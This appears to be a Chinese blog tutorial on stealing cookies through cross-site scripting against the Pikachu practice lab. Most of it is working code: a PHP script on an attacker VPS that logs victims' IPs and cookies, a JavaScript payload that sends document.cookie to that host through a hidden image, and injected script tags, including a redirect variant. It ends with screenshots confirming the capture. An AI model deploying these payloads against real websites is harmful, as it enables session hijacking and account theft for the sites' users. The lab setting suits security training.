XSS接收cookie

环境

VPS winserver2012R2 phpstudy apache php
靶机 win10 phpstudy apache php pikachu

vps放置

1.getcookie.php

<?php 

$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$cookie=$_GET['cookie'];
$fp = fopen('cookie.txt',"a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>


2.getcookie.js

var img = document.createElement('img');
img.width = 0;
img.height = 0;
img.src = 'http://ip/cookie/getcookie.php?cookie= '+encodeURIComponent(document.cookie);

3.存在xss的页面写入

<script src="http://ip/cookie/getcookie.js"></script>

另一种方式 会自动跳转到钓鱼页面, 会被用户发现。

<script>document.location='http://ip/cookie/getcookie.php?cookie='+document.cookie</script>

document.location 会跳转到指定页面

4. 攻击尝试

vps准备好 代码后
在pikachu靶场存在xss漏洞的页面中写入 3 中的xss代码

在这里插入图片描述

5.结果

VPS 上出现cookie.txt
在这里插入图片描述
在这里插入图片描述

apache log日志中也存在
在这里插入图片描述

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值